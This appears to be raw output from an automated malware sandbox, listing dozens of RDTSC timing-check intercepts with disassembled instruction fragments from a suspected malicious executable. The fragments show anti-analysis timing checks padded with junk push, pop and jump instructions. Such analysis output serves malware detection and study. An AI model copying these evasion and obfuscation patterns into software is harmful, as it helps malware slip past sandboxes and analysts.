Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C4CF second address: B2C4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C4D3 second address: B2C507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC22D01ECCEh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007FC22D01ECC6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C507 second address: B2C514 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C514 second address: B2C53F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FC22D01ECD7h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C72F second address: B2C736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C7EF second address: B2C7F4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B3E30D second address: B3E323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22CC1B8B1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A383 second address: B4A387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A4FF second address: B4A509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A509 second address: B4A554 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007FC22D01ECD8h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push ecx 0x0000001b push esi 0x0000001c pop esi 0x0000001d pop ecx 0x0000001e pushad 0x0000001f jmp 00007FC22D01ECD7h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A694 second address: B4A698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A698 second address: B4A69C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A69C second address: B4A6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jno 00007FC22CC1B8A6h 0x0000000d jmp 00007FC22CC1B8B0h 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A6BA second address: B4A6E1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22D01ECD7h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FC22D01ECCFh 0x0000000f js 00007FC22D01ECD2h 0x00000015 jnl 00007FC22D01ECC6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A949 second address: B4A969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC22CC1B8B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FC22CC1B8A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A969 second address: B4A96D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4AC0A second address: B4AC13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4AC13 second address: B4AC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4AC17 second address: B4AC1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4B038 second address: B4B055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECD9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4B1BE second address: B4B1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 jnp 00007FC22CC1B8BAh 0x0000000c jnp 00007FC22CC1B8ACh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4B1D2 second address: B4B1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4BBBB second address: B4BBCF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC22CC1B8AEh 0x00000008 jne 00007FC22CC1B8A6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4BD3F second address: B4BD43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4BD43 second address: B4BD50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4BD50 second address: B4BD79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC22D01ECCBh 0x0000000b jmp 00007FC22D01ECD6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4BE93 second address: B4BEAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push edx 0x0000000e jno 00007FC22CC1B8A6h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 push eax 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4C13A second address: B4C15D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD9h 0x00000007 jg 00007FC22D01ECCCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4F6C3 second address: B4F6E3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FC22CC1B8A8h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 jnc 00007FC22CC1B8A6h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FC12 second address: B4FC3F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC22D01ECCCh 0x00000008 jnc 00007FC22D01ECC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 jmp 00007FC22D01ECD2h 0x00000017 pop eax 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FC3F second address: B4FC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FC45 second address: B4FC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FC4E second address: B4FC52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4ECC8 second address: B4ECEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FC22D01ECD4h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FC22D01ECC6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4ECEC second address: B4ECF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FDB5 second address: B4FDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FDB9 second address: B4FDDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c jns 00007FC22CC1B8A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FDDF second address: B4FDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FDEE second address: B4FE3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FC22CC1B8B9h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push ebx 0x00000014 jmp 00007FC22CC1B8ACh 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC22CC1B8B6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FE3B second address: B4FE3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B511FD second address: B51204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B51204 second address: B5120A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B57437 second address: B5743B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5743B second address: B57441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B57441 second address: B57471 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AEh 0x00000007 push eax 0x00000008 jl 00007FC22CC1B8A6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007FC22CC1B8B2h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B12D99 second address: B12D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B56C1C second address: B56C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 jc 00007FC22CC1B8A6h 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 jnl 00007FC22CC1B8A6h 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B56C3C second address: B56C62 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22D01ECCBh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC22D01ECD3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B56C62 second address: B56C7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B572E7 second address: B572EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B572EB second address: B572F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FC22CC1B8A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B572F9 second address: B572FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5949C second address: B594A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B594A2 second address: B594A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B594A6 second address: B594AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5964F second address: B59684 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007FC22D01ECD3h 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007FC22D01ECC6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B59C19 second address: B59C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B59C26 second address: B59C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC22D01ECD3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B59CCD second address: B59CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B59CD3 second address: B59CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B59E87 second address: B59E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A002 second address: B5A008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A008 second address: B5A00C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A11F second address: B5A125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A125 second address: B5A129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A129 second address: B5A14B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jc 00007FC22D01ECD1h 0x00000014 jmp 00007FC22D01ECCBh 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A1EF second address: B5A1FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FC22CC1B8A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A1FD second address: B5A20A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A20A second address: B5A229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b nop 0x0000000c mov di, 4BD1h 0x00000010 xchg eax, ebx 0x00000011 jc 00007FC22CC1B8CBh 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007FC22CC1B8A6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A229 second address: B5A24C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A24C second address: B5A250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5C30C second address: B5C310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5C310 second address: B5C32A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FC22CC1B8A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5CEA8 second address: B5CEAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5E4F9 second address: B5E515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22CC1B8B7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5E24D second address: B5E25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FC22D01ECC6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5E25C second address: B5E26A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FC22CC1B8A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5E515 second address: B5E590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FC22D01ECC8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov esi, ecx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007FC22D01ECC8h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 mov si, 79B7h 0x00000048 mov edi, ecx 0x0000004a xchg eax, ebx 0x0000004b jng 00007FC22D01ECD5h 0x00000051 jmp 00007FC22D01ECCFh 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a pushad 0x0000005b popad 0x0000005c je 00007FC22D01ECC6h 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5EDB3 second address: B5EDBD instructions: 0x00000000 rdtsc 0x00000002 js 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5FA16 second address: B5FA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FC22D01ECCCh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5FA32 second address: B5FA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6249C second address: B624AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B624AC second address: B624B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6029E second address: B602A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B629F0 second address: B629F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B63AF9 second address: B63AFE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B64A48 second address: B64A4E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
